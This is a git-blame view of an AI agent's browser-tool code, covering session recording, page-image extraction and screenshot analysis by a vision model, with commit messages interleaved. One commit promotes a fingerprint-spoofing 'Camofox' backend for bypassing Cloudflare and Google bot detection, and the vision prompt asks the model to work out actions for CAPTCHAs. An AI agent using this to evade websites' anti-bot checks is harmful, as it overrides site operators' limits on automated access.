vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if result . get ( " success " ) :
_recording_sessions . add ( task_id )
2026-03-14 11:34:31 -07:00
logger . info ( " Auto-recording browser session %s to %s " , task_id , recording_path )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
else :
2026-03-14 11:34:31 -07:00
logger . debug ( " Could not start auto-recording: %s " , result . get ( " error " ) )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
except Exception as e :
logger . debug ( " Auto-recording setup failed: %s " , e )
def _maybe_stop_recording ( task_id : str ) :
""" Stop recording if one is active for this session. """
if task_id not in _recording_sessions :
return
try :
result = _run_browser_command ( task_id , " record " , [ " stop " ] )
if result . get ( " success " ) :
path = result . get ( " data " , { } ) . get ( " path " , " " )
2026-03-14 11:34:31 -07:00
logger . info ( " Saved browser recording for session %s : %s " , task_id , path )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
except Exception as e :
logger . debug ( " Could not stop recording for %s : %s " , task_id , e )
finally :
_recording_sessions . discard ( task_id )
2026-01-29 06:10:24 +00:00
def browser_get_images ( task_id : Optional [ str ] = None ) - > str :
"""
Get all images on the current page .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with list of images ( src and alt )
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_get_images
return camofox_get_images ( task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Use eval to run JavaScript that extracts images
js_code = """ JSON.stringify(
[ . . . document . images ] . map ( img = > ( {
src : img . src ,
alt : img . alt | | ' ' ,
width : img . naturalWidth ,
height : img . naturalHeight
} ) ) . filter ( img = > img . src & & ! img . src . startsWith ( ' data: ' ) )
) """
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " eval " , [ js_code ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
raw_result = data . get ( " result " , " [] " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
try :
# Parse the JSON string returned by JavaScript
if isinstance ( raw_result , str ) :
images = json . loads ( raw_result )
else :
images = raw_result
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : True ,
" images " : images ,
" count " : len ( images )
} , ensure_ascii = False )
except json . JSONDecodeError :
return json . dumps ( {
" success " : True ,
" images " : [ ] ,
" count " : 0 ,
" warning " : " Could not parse image data "
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to get images " )
} , ensure_ascii = False )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def browser_vision ( question : str , annotate : bool = False , task_id : Optional [ str ] = None ) - > str :
2026-01-29 06:10:24 +00:00
"""
Take a screenshot of the current page and analyze it with vision AI .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
This tool captures what ' s visually displayed in the browser and sends it
to Gemini for analysis . Useful for understanding visual content that the
text - based snapshot may not capture ( CAPTCHAs , verification challenges ,
images , complex layouts , etc . ) .
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
The screenshot is saved persistently and its file path is returned alongside
the analysis , so it can be shared with users via MEDIA : < path > in the response .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
question : What you want to know about the page visually
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
annotate : If True , overlay numbered [ N ] labels on interactive elements
2026-01-29 06:10:24 +00:00
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
2026-03-07 22:57:05 -08:00
JSON string with vision analysis results and screenshot_path
2026-01-29 06:10:24 +00:00
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_vision
return camofox_vision ( question , annotate , task_id )
2026-01-29 06:10:24 +00:00
import base64
import uuid as uuid_mod
from pathlib import Path
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
# Save screenshot to persistent location so it can be shared with users
2026-03-28 15:22:19 -07:00
from hermes_constants import get_hermes_dir
screenshots_dir = get_hermes_dir ( " cache/screenshots " , " browser_screenshots " )
2026-03-14 11:34:31 -07:00
screenshot_path = screenshots_dir / f " browser_screenshot_ { uuid_mod . uuid4 ( ) . hex } .png "
2026-01-29 06:10:24 +00:00
try :
2026-03-07 22:57:05 -08:00
screenshots_dir . mkdir ( parents = True , exist_ok = True )
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
# Prune old screenshots (older than 24 hours) to prevent unbounded disk growth
_cleanup_old_screenshots ( screenshots_dir , max_age_hours = 24 )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Take screenshot using agent-browser
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
screenshot_args = [ ]
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if annotate :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
screenshot_args . append ( " --annotate " )
screenshot_args . append ( " --full " )
screenshot_args . append ( str ( screenshot_path ) )
2026-01-29 06:10:24 +00:00
result = _run_browser_command (
2026-03-14 11:34:31 -07:00
effective_task_id ,
" screenshot " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
screenshot_args ,
2026-01-29 06:10:24 +00:00
)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if not result . get ( " success " ) :
2026-03-08 19:31:23 -07:00
error_detail = result . get ( " error " , " Unknown error " )
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : False ,
2026-03-08 19:31:23 -07:00
" error " : f " Failed to take screenshot ( { mode } mode): { error_detail } "
2026-01-29 06:10:24 +00:00
} , ensure_ascii = False )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
actual_screenshot_path = result . get ( " data " , { } ) . get ( " path " )
if actual_screenshot_path :
screenshot_path = Path ( actual_screenshot_path )
2026-01-29 06:10:24 +00:00
# Check if screenshot file was created
if not screenshot_path . exists ( ) :
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : False ,
2026-03-08 19:31:23 -07:00
" error " : (
f " Screenshot file was not created at { screenshot_path } ( { mode } mode). "
f " This may indicate a socket path issue (macOS /var/folders/), "
f " a missing Chromium install ( ' agent-browser install ' ), "
f " or a stale daemon process. "
) ,
2026-01-29 06:10:24 +00:00
} , ensure_ascii = False )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Read and convert to base64
image_data = screenshot_path . read_bytes ( )
image_base64 = base64 . b64encode ( image_data ) . decode ( " ascii " )
data_url = f " data:image/png;base64, { image_base64 } "
2026-03-14 11:34:31 -07:00
2026-02-22 02:16:11 -08:00
vision_prompt = (
f " You are analyzing a screenshot of a web browser. \n \n "
f " User ' s question: { question } \n \n "
f " Provide a detailed and helpful answer based on what you see in the screenshot. "
f " If there are interactive elements, describe them. If there are verification challenges "
f " or CAPTCHAs, describe what type they are and what action might be needed. "
f " Focus on answering the user ' s specific question. "
)
2026-01-29 06:10:24 +00:00
2026-03-11 20:52:19 -07:00
# Use the centralized LLM router
2026-03-08 19:54:32 -07:00
vision_model = _get_vision_model ( )
2026-03-11 20:52:19 -07:00
logger . debug ( " browser_vision: analysing screenshot ( %d bytes) " ,
len ( image_data ) )
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
# Read vision timeout from config (auxiliary.vision.timeout), default 120s.
# Local vision models (llama.cpp, ollama) can take well over 30s for
# screenshot analysis, so the default must be generous.
vision_timeout = 120.0
try :
from hermes_cli . config import load_config
_cfg = load_config ( )
_vt = _cfg . get ( " auxiliary " , { } ) . get ( " vision " , { } ) . get ( " timeout " )
if _vt is not None :
vision_timeout = float ( _vt )
except Exception :
pass
2026-03-11 20:52:19 -07:00
call_kwargs = {
" task " : " vision " ,
" messages " : [
2026-02-22 02:16:11 -08:00
{
" role " : " user " ,
" content " : [
{ " type " : " text " , " text " : vision_prompt } ,
{ " type " : " image_url " , " image_url " : { " url " : data_url } } ,
2026-01-29 06:10:24 +00:00
] ,
2026-02-22 02:16:11 -08:00
}
] ,
2026-03-11 20:52:19 -07:00
" max_tokens " : 2000 ,
" temperature " : 0.1 ,
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
" timeout " : vision_timeout ,
2026-03-11 20:52:19 -07:00
}
if vision_model :
call_kwargs [ " model " ] = vision_model
response = call_llm ( * * call_kwargs )
2026-03-14 11:34:31 -07:00
2026-03-28 17:25:04 -07:00
analysis = ( response . choices [ 0 ] . message . content or " " ) . strip ( )
2026-04-01 02:08:58 +03:00
# Redact secrets the vision LLM may have read from the screenshot.
from agent . redact import redact_sensitive_text
analysis = redact_sensitive_text ( analysis )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
response_data = {
2026-02-22 02:16:11 -08:00
" success " : True ,
